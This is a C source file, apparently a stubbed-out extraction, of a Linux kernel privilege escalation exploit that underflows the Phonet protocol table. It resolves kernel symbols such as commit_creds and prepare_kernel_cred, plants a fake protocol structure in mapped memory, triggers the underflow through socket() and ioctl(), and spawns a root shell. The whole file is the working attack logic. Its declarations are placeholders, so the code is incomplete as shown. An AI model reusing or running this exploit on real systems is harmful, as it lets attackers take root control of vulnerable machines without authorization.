
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct proto_ops_skel {int * ioctl; int family; } ;
struct phonet_protocol_skel {void* ops; void* prot; int sock_type; } ;
typedef int pps ;


 int AF_PHONET ;
 scalar_t__ EPERM ;
 int MAP_ANONYMOUS ;
 void* MAP_FAILED ;
 int MAP_PRIVATE ;
 int PF_PHONET ;
 int PROT_EXEC ;
 int PROT_READ ;
 int PROT_WRITE ;
 int SOCK_DGRAM ;
 scalar_t__ SYM_ADDRESS ;
 char* SYM_NAME ;
 unsigned long SYM_OFFSET ;
 int close (int) ;
 void* commit_creds ;
 scalar_t__ errno ;
 int execl (char*,char*,int *) ;
 unsigned long get_kernel_sym (char*) ;
 int getroot ;
 scalar_t__ getuid () ;
 int ioctl (int,int ,int *) ;
 int memcpy (void*,struct phonet_protocol_skel*,int) ;
 void* mmap (void*,int,int,int,int,int ) ;
 int munmap (void*,int) ;
 int perror (char*) ;
 void* prepare_kernel_cred ;
 int printf (char*,...) ;
 int socket (int ,int ,int) ;

int main(int argc, char * argv[])
{

 int sock, proto;
 unsigned long proto_tab, low_kern_sym, pn_proto;
 void * map;


 printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n");
 sock = socket(PF_PHONET, SOCK_DGRAM, 0);

 if(sock < 0) {
  if(errno == EPERM)
   printf("[*] You don't have CAP_SYS_ADMIN.\n");

  else
   printf("[*] Failed to open Phonet socket.\n");

  return -1;
 }

 close(sock);


 printf("[*] Resolving kernel symbols...\n");

 proto_tab = get_kernel_sym("proto_tab");
 low_kern_sym = get_kernel_sym(SYM_NAME) + SYM_OFFSET;
 pn_proto = get_kernel_sym("pn_proto");
 commit_creds = (void *) get_kernel_sym("commit_creds");
 prepare_kernel_cred = (void *) get_kernel_sym("prepare_kernel_cred");

 if(!proto_tab || !commit_creds || !prepare_kernel_cred) {
  printf("[*] Failed to resolve kernel symbols.\n");
  return -1;
 }

 if (low_kern_sym >= proto_tab) {
  printf("[*] %s is mapped higher than prototab.  Can not underflow :-(.\n", SYM_NAME);
  return -1;
 }



 printf("[*] Preparing fake structures...\n");

 const struct proto_ops_skel fake_proto_ops2 = {
   .family = AF_PHONET,
   .ioctl = &getroot,
 };

 struct phonet_protocol_skel pps = {
   .ops = (void *) &fake_proto_ops2,
   .prot = (void *) pn_proto,
   .sock_type = SOCK_DGRAM,
 };

 printf("[*] Copying Structures.\n");

 map = mmap((void *) SYM_ADDRESS, 0x1000,
   PROT_READ | PROT_WRITE | PROT_EXEC,
   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

 if(map == MAP_FAILED) {
  printf("[*] Failed to map landing area.\n");
  perror("mmap");
  return -1;
 }


 memcpy((void *) SYM_ADDRESS, &pps, sizeof(pps));


 proto = -((proto_tab - low_kern_sym) / sizeof(void *));

 printf("[*] Underflowing with offset %d\n", proto);

 sock = socket(PF_PHONET, SOCK_DGRAM, proto);

 if(sock < 0) {
  printf("[*] Underflow failed :-(.\n");
  return -1;
 }

 printf("[*] Elevating privlidges...\n");
 ioctl(sock, 0, ((void*)0));


 if(getuid()) {
  printf("[*] Exploit failed to get root.\n");
  return -1;
 }

 printf("[*] This was a triumph... I'm making a note here, huge success.\n");
 execl("/bin/sh", "/bin/sh", ((void*)0));

 close(sock);
 munmap(map, 0x1000);

 return 0;
}
